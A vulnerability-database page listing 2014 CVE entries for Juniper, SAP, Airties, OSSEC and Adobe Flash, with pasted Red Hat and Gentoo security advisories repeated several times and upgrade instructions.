VARIoT IoT vulnerabilities database
| VAR-201409-0547 | CVE-2014-3811 | Vulnerability in Juniper Installer Service Client and Junos Pulse Client for Windows that allows privileges to be gained |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Juniper Installer Service (JIS) Client 7.x before 7.4R6 for Windows and Junos Pulse Client before 4.0R6 allows local users to gain privileges via unspecified vectors. Multiple Juniper Junos products are prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to escalate their access to root privileges.
| VAR-201409-1159 | No CVE | Unspecified Path Traversal Vulnerability in SAP Application-Specific Upgrade |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
SAP is the world's leading provider of enterprise management software solutions. The SAP Application-Specific Upgrade has an unspecified path traversal vulnerability: because the program fails to properly filter user input, an attacker can launch a path traversal attack with a specially crafted request.
| VAR-201501-0377 | CVE-2014-100032 | Cross-site scripting vulnerability in top.html on the Airties Air 6372 modem |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in top.html in the Airties Air 6372 modem allows remote attackers to inject arbitrary web script or HTML via the productboardtype parameter. AirTies Air is a set-top box device. Air 6372 is prone to a cross-site scripting vulnerability. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
| VAR-201412-0527 | CVE-2014-5284 | Vulnerability in OSSEC host-deny.sh that allows access restrictions in hosts.deny to be changed |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
host-deny.sh in OSSEC before 2.8.1 writes to temporary files with predictable filenames without verifying ownership, which allows local users to modify access restrictions in hosts.deny and gain root privileges by creating the temporary files before automatic IP blocking is performed. OSSEC is prone to an insecure temporary file-creation vulnerability.
An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Other attacks may also be possible.
OSSEC 2.8 is vulnerable; other versions may also be affected.
| VAR-201409-0433 | CVE-2014-0548 | Same Origin Policy bypass vulnerability in Adobe Flash Player and Adobe AIR |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow remote attackers to bypass the Same Origin Policy via unspecified vectors.
An attacker can exploit this issue to bypass certain same-origin policy restrictions, which may aid in further attacks. Security flaws exist in several Adobe products.
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0548)
All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 11.2.202.406.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process or bypass security restrictions.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0434 | CVE-2014-0549 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, and CVE-2014-0555.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products.
| VAR-201409-0435 | CVE-2014-0550 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0551, CVE-2014-0552, and CVE-2014-0555.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products.
| VAR-201409-0432 | CVE-2014-0553 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Use-after-free vulnerability in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allows attackers to execute arbitrary code via unspecified vectors. Supplementary information: the vulnerability type has been identified as CWE-416: Use After Free (use of freed memory). http://cwe.mitre.org/data/definitions/416.html An attacker could execute arbitrary code. Failed exploit attempts will likely cause a denial-of-service condition. A use-after-free vulnerability exists in several Adobe products.
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy. (CVE-2014-0548)
All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 11.2.202.406.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U
PAXT7xPKbEDLocPPmOJo7t8=
=d7aB
-----END PGP SIGNATURE-----
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0430 | CVE-2014-0551 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0552, and CVE-2014-0555. This is a different vulnerability from CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0552, and CVE-2014-0555. An attacker could execute arbitrary code or cause a denial of service (memory corruption).
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U
PAXT7xPKbEDLocPPmOJo7t8=
=d7aB
-----END PGP SIGNATURE-----
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0431 | CVE-2014-0552 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, and CVE-2014-0555. This is a different vulnerability from CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, and CVE-2014-0555. An attacker could execute arbitrary code or cause a denial of service (memory corruption).
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
